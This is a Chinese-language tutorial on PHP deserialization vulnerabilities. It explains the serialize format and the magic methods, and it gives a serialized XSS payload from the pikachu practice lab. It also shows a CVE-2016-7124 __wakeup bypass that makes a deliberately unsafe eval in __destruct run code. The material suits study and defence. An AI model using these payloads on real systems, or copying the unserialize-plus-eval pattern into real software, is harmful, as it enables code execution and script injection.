PHP反序列化漏洞知识整理
0x00 序列化与反序列化
序列化:将对象转化为字符串的形式,称为序列化,在php中可以使用serialize函数实现
反序列化:将字符串还原成对象的形式,称为反序列化,在php中可以使用unserialize函数实现
一个序列化的例子
运行结果:<?php class Test{ public $a = 'ThisA'; protected $b = 'ThisB'; private $c = 'ThisC'; public function test1(){ echo 'this is test1 '; } } $test = new Test(); var_dump(serialize($test)); ?>
O:4:"Test":3:{s:1:"a";s:5:"ThisA";s:4:"�*�b";s:5:"ThisB";s:7:"�Test�c";s:5:"ThisC";}O:4:"Test":3的解释:O标识这是一个对象,4表示对象名的长度,“Test”表示对象名,3表示了对象有3个成员
s:1:"a";s:5:"ThisA";的解释:s表示类型为String,为字符串,1表示成员名长度,“a”是这个成员名;s:5:"ThisA",表示值类型为字符串长度为5,值未“ThisA”。
protected属性成员 序列化后名字会以
"%00*%00b"表示,即%00*%00成员名private属性成员 序列化后会名字会以
"%00Test%00c"表示,即%00类名%00成员名可以看到,对象的方法并不序列化到字符串中。
对于不同类型的序列化字符串保存形式
String : s:size:value;
Integer : i:value;
Boolean : b:value;(保存1或0)
Null : N;
Array : a:size:{key definition;value definition;(repeated per element)}
Object : O:strlen(object name):object name:object size:{s:strlen(property name):property name:property definition;(repeated per property)}
一个反序列化例子:
<?php class Test{ public $a = 'ThisA'; protected $b = 'ThisB'; private $c = 'ThisC'; public function test1(){ echo 'this is test1'; } } $test = new Test(); $str = serialize($test); //通过反序列化创建对象并执行函数 $test1 = unserialize($str); $test1->test1(); ?>
0x01 魔法函数
__construct()当一个对象创建时被调用
__destruct()当一个对象销毁时被调用
__toString()当一个对象被当作一个字符串使用
__sleep() 在对象在被序列化之前运行
__wakeup将在序列化之后立即被调用代码例子:
执行结果:<?php class Test{ function __construct(){ echo 'construct run<br>'; } function __destruct(){ echo 'destruct run<br>'; } function __toString(){ return 'toString run<br>'; } function __sleep(){ echo 'sleep run<br>'; return array(); } function __wakeup(){ echo 'wakeup run<br>'; } } $test = new Test(); // __construct run echo $test; // __toString run $str = serialize($test); // __sleep run $test1 = unserialize($str); // __wakeup run unset($test); // __destruct run ?>
0x02 反序列化漏洞
序列化和反序列化本身并没有问题,但结合了魔法函数加上参数可控,就可能造成问题,以pikachu靶场的一个例子:
class S{ var $test = "pikachu"; function __construct(){ echo $this->test; } } //O:1:"S":1:{s:4:"test";s:29:"<script>alert('xss')</script>";} $html=''; if(isset($_POST['o'])){ $s = $_POST['o']; if(!@$unser = unserialize($s)){ $html.="<p>大兄弟,来点劲爆点儿的!</p>"; }else{ $html.="<p>{$unser->test}</p>"; } }用户可以传递序列化字符串给服务器进行反序列化,并将对象的test成员输出到页面上,此时的test的值为我们所控
提交payload触发xss:O:1:"S":1:{s:4:"test";s:29:"<script>alert('xss')</script>";}
0x03 CVE-2016-7124(绕过__wakeup函数)
影响版本:PHP5 < 5.6.25
PHP7 < 7.0.10在反序列化时,如果字符串中对象属性个数大于实际属性个数,wakeup将跳过执行。
<?php class Test{ public $test='123456'; function __wakeup(){ $this->test = 'echo "wakeup run";'; } function __destruct(){ @eval($this->test); } } $str = 'O:4:"Test":1:{s:4:"test";s:10:"phpinfo();";}'; $test1 = unserialize($str); ?>以上代码的执行结果
当序列化字符串将对象属性个数修改成大于实际数量时,将绕过wakeup的执行,$str = 'O:4:"Test":2:{s:4:"test";s:10:"phpinfo();";}';
